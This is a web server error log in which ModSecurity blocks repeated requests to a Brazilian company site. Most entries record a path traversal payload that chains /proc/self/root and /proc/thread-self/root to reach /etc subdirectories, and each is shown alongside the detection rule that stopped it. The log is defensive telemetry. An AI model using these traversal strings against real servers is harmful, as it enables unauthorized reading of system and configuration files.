[Tue Mar 17 14:22:52.450498 2026] [:error] [pid 18380:tid 140411666392832] [client 74.7.243.128:47964] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmN7K4xEDsg_V3ESNZNeAAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:22:53.752202 2026] [:error] [pid 29151:tid 140411548894976] [client 74.7.243.128:47968] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmN7fPqhzTj3BvfDX-JCgAAAdc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:22:55.201556 2026] [:error] [pid 28879:tid 140411708356352] [client 74.7.243.128:47972] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmN71DN3UhJjLukrK-MLgAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:23:08.141803 2026] [proxy_fcgi:error] [pid 9299:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:55264] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:23:09.234922 2026] [:error] [pid 17965:tid 140411725141760] [client 74.7.241.31:36022] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmN_at8Nd0UC_OcbVHL-gAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:23:10.967874 2026] [:error] [pid 29359:tid 140411590858496] [client 74.7.241.31:47822] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmN_qSy22zYCMGxsIld3wAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:23:11.359804 2026] [:error] [pid 7437:tid 140411590858496] [client 74.7.243.128:39246] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmN_weiSKl8TjouI-YayAAAA9I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:23:12.359927 2026] [:error] [pid 6296:tid 140411691570944] [client 74.7.241.31:47826] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOAHIk7brgkOH-rIWM0QAAAUY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:23:13.130527 2026] [:error] [pid 2598:tid 140411574073088] [client 74.7.243.128:39256] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOARj0p0SRWAqcjGF6nAAAAxQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:23:13.835277 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.241.31:47838] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOAdY0UrI5A3LftIz9KgAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:23:14.257618 2026] [:error] [pid 2598:tid 140411683178240] [client 74.7.228.61:48350] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmOAhj0p0SRWAqcjGF6nQAAAwc"]
[Tue Mar 17 14:23:15.295293 2026] [:error] [pid 2473:tid 140411716749056] [client 74.7.241.31:47850] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOA6BJNF7axNlVR0UYcQAAAAM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:23:15.865043 2026] [:error] [pid 29151:tid 140411649607424] [client 74.7.243.128:39260] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOA_PqhzTj3BvfDX-JEAAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:23:16.332571 2026] [:error] [pid 6296:tid 140411683178240] [client 74.7.244.43:43670] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmOBHIk7brgkOH-rIWM0gAAAUc"]
[Tue Mar 17 14:23:16.906307 2026] [:error] [pid 6296:tid 140411540502272] [client 74.7.241.31:47852] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOBHIk7brgkOH-rIWM0wAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:23:18.231120 2026] [:error] [pid 9299:tid 140411658000128] [client 74.7.241.31:56312] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOBr-sgTmmJoPuMdy3YwAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:23:19.675699 2026] [:error] [pid 18380:tid 140411683178240] [client 74.7.241.31:56320] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOB64xEDsg_V3ESNZNewAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:23:21.068908 2026] [:error] [pid 29359:tid 140411565680384] [client 74.7.241.31:56326] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOCaSy22zYCMGxsIld6QAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:23:22.523248 2026] [:error] [pid 17965:tid 140411607643904] [client 74.7.241.31:56340] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOCqt8Nd0UC_OcbVHL-wAAAJA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:23:22.999679 2026] [:error] [pid 29359:tid 140411649607424] [client 74.7.243.128:39270] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOCqSy22zYCMGxsIld6wAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:23:23.886844 2026] [:error] [pid 29359:tid 140411599251200] [client 74.7.241.31:56342] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOC6Sy22zYCMGxsIld7AAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:23:25.308589 2026] [:error] [pid 29359:tid 140411741927168] [client 74.7.241.31:56348] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmODaSy22zYCMGxsIld7wAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 14:23:25.770756 2026] [:error] [pid 29359:tid 140411607643904] [client 74.7.243.128:37766] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmODaSy22zYCMGxsIld8AAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 14:23:27.537539 2026] [:error] [pid 18380:tid 140411607643904] [client 74.7.243.128:37770] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmOD64xEDsg_V3ESNZNfAAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
